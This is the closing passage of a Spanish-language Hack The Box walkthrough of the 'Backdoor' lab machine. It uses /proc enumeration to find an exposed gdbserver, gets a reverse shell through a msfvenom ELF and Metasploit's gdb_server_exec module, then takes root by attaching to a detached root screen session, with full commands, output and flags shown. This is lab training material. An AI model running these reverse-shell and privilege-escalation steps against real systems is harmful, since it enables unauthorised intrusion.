/proc/913/cmdline       [Status: 200, Size: 218, Words: 3, Lines: 1]
/proc/9951/cmdline      [Status: 200, Size: 241, Words: 5, Lines: 1]
/proc/9959/cmdline      [Status: 200, Size: 238, Words: 5, Lines: 1]
:: Progress: [10001/10001] :: Job [1/1] :: 359 req/sec :: Duration: [0:01:01] :: Errors: 0 ::
 π ~/htb/backdoor ❯

Tras descargar cada uno de los archivos vemos multiples comandos siendo ejecutados entre ellos un servidor de gdbserver ejecutado por el usuario user y, screen por root. gdb esta siendo ejecutado en el puerto 1337 que encontramos en net/tcp.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

 π ~/htb/backdoor/proc_files ❯ more * |cat
::::::::::::::
816
::::::::::::::
/bin/sh-cwhile true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
::::::::::::::
822
::::::::::::::

/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
::::::::::::::
833
::::::::::::::
sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
::::::::::::::
913
::::::::::::::
/sbin/agetty-o-p -- \u--nocleartty1linux
::::::::::::::
9951
::::::::::::::
suuser-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
::::::::::::::
9959
::::::::::::::
bash-ccd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;
π ~/htb/backdoor/proc_files ❯

GDBServer

ELF File

Encontramos que es posible ejecutar un archivo elf para obtener una shell inversa tras configurar un archivo en el servidor. Creamos el archivo utilizando msfvenom.

1
2
3
4
5
6
7
8
9

 π ~/htb/backdoor ❯ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.30 LPORT=1338 PrependFork=true -f elf -o binary.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: binary.elf
 π ~/htb/backdoor ❯ chmod +x binary.elf
 π ~/htb/backdoor ❯

Ejecutamos gdb con el archivo creado.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

 π ~/htb/backdoor ❯ gdb binary.elf
GNU gdb (Debian 10.1-2) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from binary.elf...
(No debugging symbols found in binary.elf)
(gdb)

Realizamos la conexión con el servidor gdb, subimos el .elf, configuramos como ejecutable el archivo para finalmente ejecutarlo.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
(gdb) remote put binary.elf binary.elf
Successfully sent file "binary.elf".
(gdb) set remote exec-file /home/user/binary.elf
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /home/user/binary.elf from remote target...
Reading /home/user/binary.elf from remote target...
Reading symbols from target:/home/user/binary.elf...
(No debugging symbols found in target:/home/user/binary.elf)
[Detaching after fork from child process 1529]
[Inferior 1 (process 1520) exited normally]
(gdb)

En nuestra shell con netcat vemos que logramos obtener una shell como usuario user.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/backdoor ❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.30] from 10.10.11.125 [10.10.11.125] 36976
id
uid=1000(user) gid=1000(user) groups=1000(user)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
user@Backdoor:/home/user$ pwd
/home/user
user@Backdoor:/home/user$

Metasploit

Encontramos que existe un exploit de metasploit que permite ejecutar comandos. Tras configurar el exploit en metasploit obtuvimos una shell con el usuario user y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

msf6 exploit(multi/gdb/gdb_server_exec) > show options

Module options (exploit/multi/gdb/gdb_server_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
   RHOSTS    10.10.11.125     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT     1337             yes       The target port (TCP)


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.30      yes       The listen address (an interface may be specified)
   LPORT  12345            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   x86_64 (64-bit)


msf6 exploit(multi/gdb/gdb_server_exec) >
msf6 exploit(multi/gdb/gdb_server_exec) > run

[*] Started reverse TCP handler on 10.10.14.30:12345
[*] 10.10.11.125:1337 - Performing handshake with gdbserver...
[*] 10.10.11.125:1337 - Stepping program to find PC...
[*] 10.10.11.125:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.10.11.125:1337 - Executing the payload...
[*] Command shell session 1 opened (10.10.14.30:12345 -> 10.10.11.125:38856 ) at 2021-11-21 01:05:32 +0000

whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)
ls -lah
total 36K
drwxr-xr-x 6 user user 4.0K Nov 10 14:18 .
drwxr-xr-x 3 root root 4.0K Nov 10 14:18 ..
lrwxrwxrwx 1 root root    9 Jul 18 21:43 .bash_history -> /dev/null
-rw-r--r-- 1 user user 3.7K Feb 25  2020 .bashrc
drwx------ 2 user user 4.0K Nov 10 14:18 .cache
drwx------ 3 user user 4.0K Nov 10 14:18 .config
drwx------ 4 user user 4.0K Nov 10 14:18 .gnupg
drwxrwxr-x 3 user user 4.0K Nov 10 14:18 .local
-rw-r--r-- 1 user user  807 Feb 25  2020 .profile
-rw-r----- 1 root user   33 Nov 20 23:05 user.txt
cat user.txt
98c7ff1956a8e023beac2c2dc9a6d2c5

Privesc

Enumerando los procesos en ejecucion por el usuario root vemos que esta ejecutando una sesion suelta (detached), tal y como se mostraba en los archivos proc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

user@Backdoor:~$ ps -ef|grep root
ps -ef|grep root
[.. snip ..]
root         795       1  0 03:45 ?        00:00:00 /usr/sbin/cron -f
root         797     795  0 03:45 ?        00:00:00 /usr/sbin/CRON -f
root         798     795  0 03:45 ?        00:00:00 /usr/sbin/CRON -f
root         816     798  0 03:45 ?        00:00:01 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
root         822     797  0 03:45 ?        00:00:00 /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
root         833       1  0 03:45 ?        00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         906       1  0 03:45 ?        00:00:00 SCREEN -dmS root
root         908     906  0 03:45 pts/0    00:00:00 -/bin/bash
root         913       1  0 03:45 tty1     00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
[.. snip ..]
user@Backdoor:~$

Nos conectamos a la sesion como invitado logrando obtener una shell como root y nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

$ script /dev/null
$ export TERM='vt100'
$ screen -x root/root
root@Backdoor:~# whoami; id
whoami; id
root
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~# cd /root
cd /root
root@Backdoor:~# ls
ls
root.txt
root@Backdoor:~# cat root.txt
cat root.txt
1d42d242599341801ed69f61f309d37f
root@Backdoor:~#
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HTB: Backdoor